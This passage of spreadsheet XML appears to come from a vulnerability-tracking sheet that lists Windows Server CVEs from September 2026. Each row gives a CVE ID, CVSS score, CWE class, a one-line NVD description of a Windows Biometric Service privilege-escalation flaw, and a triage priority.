          <t>CVE-2026-83954</t>
        </is>
      </c>
      <c r="D675" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E675" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F675" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G675" s="5" t="inlineStr"/>
      <c r="H675" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I675" s="5" t="inlineStr"/>
      <c r="J675" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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5" s="5" t="inlineStr"/>
      <c r="M675" s="5" t="inlineStr"/>
      <c r="N675" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O675" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P675" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q675" s="5" t="inlineStr"/>
      <c r="R675" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S675" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T675" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83954</t>
        </is>
      </c>
    </row>
    <row r="676">
      <c r="A676" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B676" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C676" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83955</t>
        </is>
      </c>
      <c r="D676" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E676" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F676" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G676" s="5" t="inlineStr"/>
      <c r="H676" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I676" s="5" t="inlineStr"/>
      <c r="J676" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K67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6" s="5" t="inlineStr"/>
      <c r="M676" s="5" t="inlineStr"/>
      <c r="N676" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O676" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P676" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q676" s="5" t="inlineStr"/>
      <c r="R676" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S676" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T676" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83955</t>
        </is>
      </c>
    </row>
    <row r="677">
      <c r="A677" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B677" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C677" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83967</t>
        </is>
      </c>
      <c r="D677" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E677" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F677" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G677" s="5" t="inlineStr"/>
      <c r="H677" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I677" s="5" t="inlineStr"/>
      <c r="J677" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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7" s="5" t="inlineStr"/>
      <c r="M677" s="5" t="inlineStr"/>
      <c r="N677" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O677" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P677" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q677" s="5" t="inlineStr"/>
      <c r="R677" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S677" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T677" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83967</t>
        </is>
      </c>
    </row>
    <row r="678">
      <c r="A678" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B678" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C678" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83968</t>
        </is>
      </c>
      <c r="D678" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E678" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F678" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G678" s="5" t="inlineStr"/>
      <c r="H678" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I678" s="5" t="inlineStr"/>
      <c r="J678" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K67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8" s="5" t="inlineStr"/>
      <c r="M678" s="5" t="inlineStr"/>
      <c r="N678" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O678" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P678" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q678" s="5" t="inlineStr"/>
      <c r="R678" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-416</t>
        </is>
      </c>
      <c r="S678" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T678" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83968</t>
        </is>
      </c>
    </row>
    <row r="679">
      <c r="A679" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B679" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C679" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83969</t>
        </is>
      </c>
      <c r="D679" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E679" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F679" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G679" s="5" t="inlineStr"/>
      <c r="H679" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I679" s="5" t="inlineStr"/>
      <c r="J679" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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9" s="5" t="inlineStr"/>
      <c r="M679" s="5" t="inlineStr"/>
      <c r="N679" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O679" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P679" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q679" s="5" t="inlineStr"/>
      <c r="R679" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S679" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T679" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83969</t>
        </is>
      </c>
    </row>
    <row r="680">
      <c r="A680" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B680" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C680" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83970</t>
        </is>
      </c>
      <c r="D680" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E680" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F680" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G680" s="5" t="inlineStr"/>
      <c r="H680" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I680" s="5" t="inlineStr"/>
      <c r="J680" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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0" s="5" t="inlineStr"/>
      <c r="M680" s="5" t="inlineStr"/>
      <c r="N680" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O680" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P680" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q680" s="5" t="inlineStr"/>
      <c r="R680" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S680" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T680" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83970</t>
        </is>
      </c>
    </row>
    <row r="681">
      <c r="A681" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B681" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C681" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83971</t>
        </is>
      </c>
      <c r="D681" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E681" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F681" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G681" s="5" t="inlineStr"/>
      <c r="H681" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I681" s="5" t="inlineStr"/>
      <c r="J681" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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1" s="5" t="inlineStr"/>
      <c r="M681" s="5" t="inlineStr"/>
      <c r="N681" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O681" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P681" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q681" s="5" t="inlineStr"/>
      <c r="R681" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S681" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T681" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83971</t>
        </is>
      </c>
    </row>
    <row r="682">
      <c r="A682" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B682" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C682" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83972</t>
        </is>
      </c>
      <c r="D682" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E682" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F682" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G682" s="5" t="inlineStr"/>
      <c r="H682" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I682" s="5" t="inlineStr"/>
      <c r="J682" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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2" s="5" t="inlineStr"/>
      <c r="M682" s="5" t="inlineStr"/>
      <c r="N682" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O682" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P682" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q682" s="5" t="inlineStr"/>
      <c r="R682" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S682" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T682" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83972</t>
        </is>
      </c>
    </row>
    <row r="683">
      <c r="A683" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B683" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C683" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83973</t>
        </is>
      </c>
      <c r="D683" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E683" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F683" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G683" s="5" t="inlineStr"/>
      <c r="H683" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I683" s="5" t="inlineStr"/>
      <c r="J683" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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3" s="5" t="inlineStr"/>
      <c r="M683" s="5" t="inlineStr"/>
      <c r="N683" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O683" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P683" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q683" s="5" t="inlineStr"/>
      <c r="R683" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S683" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T683" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83973</t>
        </is>
      </c>
    </row>
    <row r="684">
      <c r="A684" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B684" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C684" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83974</t>
        </is>
      </c>
      <c r="D684" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E684" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F684" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G684" s="5" t="inlineStr"/>
      <c r="H684" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I684" s="5" t="inlineStr"/>
      <c r="J684" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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4" s="5" t="inlineStr"/>
      <c r="M684" s="5" t="inlineStr"/>
      <c r="N684" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O684" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P684" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q684" s="5" t="inlineStr"/>
      <c r="R684" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S684" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T684" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83974</t>
        </is>
      </c>
    </row>
    <row r="685">
      <c r="A685" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B685" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C685" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83975</t>
        </is>
      </c>
      <c r="D685" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E685" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F685" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G685" s="5" t="inlineStr"/>
      <c r="H685" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I685" s="5" t="inlineStr"/>
      <c r="J685" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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5" s="5" t="inlineStr"/>
      <c r="M685" s="5" t="inlineStr"/>
      <c r="N685" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O685" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P685" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q685" s="5" t="inlineStr"/>
      <c r="R685" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S685" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T685" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83975</t>
        </is>
      </c>
    </row>
    <row r="686">
      <c r="A686" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B686" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C686" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83976</t>
        </is>
      </c>
      <c r="D686" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E686" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F686" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G686" s="5" t="inlineStr"/>
      <c r="H686" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I686" s="5" t="inlineStr"/>
      <c r="J686" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K68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6" s="5" t="inlineStr"/>
      <c r="M686" s="5" t="inlineStr"/>
      <c r="N686" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O686" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P686" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q686" s="5" t="inlineStr"/>
      <c r="R686" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S686" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T686" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83976</t>
        </is>
      </c>
    </row>
    <row r="687">
      <c r="A687" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B687" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C687" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83977</t>
        </is>
      </c>
      <c r="D687" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E687" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F687" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G687" s="5" t="inlineStr"/>
      <c r="H687" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I687" s="5" t="inlineStr"/>
      <c r="J687" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K68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7" s="5" t="inlineStr"/>
      <c r="M687" s="5" t="inlineStr"/>
      <c r="N687" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O687" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P687" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q687" s="5" t="inlineStr"/>
      <c r="R687" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S687" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T687" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83977</t>
        </is>
      </c>
    </row>
    <row r="688">
      <c r="A688" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B688" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C688" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83978</t>
        </is>
      </c>
      <c r="D688" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E688" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F688" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G688" s="5" t="inlineStr"/>
      <c r="H688" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I688" s="5" t="inlineStr"/>
      <c r="J688" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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8" s="5" t="inlineStr"/>
      <c r="M688" s="5" t="inlineStr"/>
      <c r="N688" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O688" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P688" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q688" s="5" t="inlineStr"/>
      <c r="R688" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S688" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T688" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83978</t>
        </is>
      </c>
    </row>
    <row r="689">
      <c r="A689" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B689" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C689" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83979</t>
        </is>
      </c>
      <c r="D689" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E689" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F689" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G689" s="5" t="inlineStr"/>
      <c r="H689" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I689" s="5" t="inlineStr"/>
      <c r="J689" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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9" s="5" t="inlineStr"/>
      <c r="M689" s="5" t="inlineStr"/>
      <c r="N689" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O689" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P689" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q689" s="5" t="inlineStr"/>
      <c r="R689" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S689" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T689" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83979</t>
        </is>
      </c>
    </row>
    <row r="690">
      <c r="A690" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B690" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C690" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83980</t>
        </is>
      </c>
      <c r="D690" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E690" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F690" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G690" s="5" t="inlineStr"/>
      <c r="H690" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I690" s="5" t="inlineStr"/>
      <c r="J690" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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0" s="5" t="inlineStr"/>
      <c r="M690" s="5" t="inlineStr"/>
      <c r="N690" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O690" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P690" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q690" s="5" t="inlineStr"/>
      <c r="R690" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S690" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T690" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83980</t>
        </is>
      </c>
    </row>
    <row r="691">
      <c r="A691" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B691" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C691" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83981</t>
        </is>
      </c>
      <c r="D691" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E691" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F691" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G691" s="5" t="inlineStr"/>
      <c r="H691" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I691" s="5" t="inlineStr"/>
      <c r="J691" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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1" s="5" t="inlineStr"/>
      <c r="M691" s="5" t="inlineStr"/>
      <c r="N691" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O691" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P691" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q691" s="5" t="inlineStr"/>
      <c r="R691" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S691" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T691" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83981</t>
        </is>
      </c>
    </row>
    <row r="692">
      <c r="A692" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B692" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C692" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83982</t>
        </is>
      </c>
      <c r="D692" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E692" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F692" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G692" s="5" t="inlineStr"/>
      <c r="H692" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I692" s="5" t="inlineStr"/>
      <c r="J692" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K69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2" s="5" t="inlineStr"/>
      <c r="M692" s="5" t="inlineStr"/>
      <c r="N692" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O692" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P692" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q692" s="5" t="inlineStr"/>
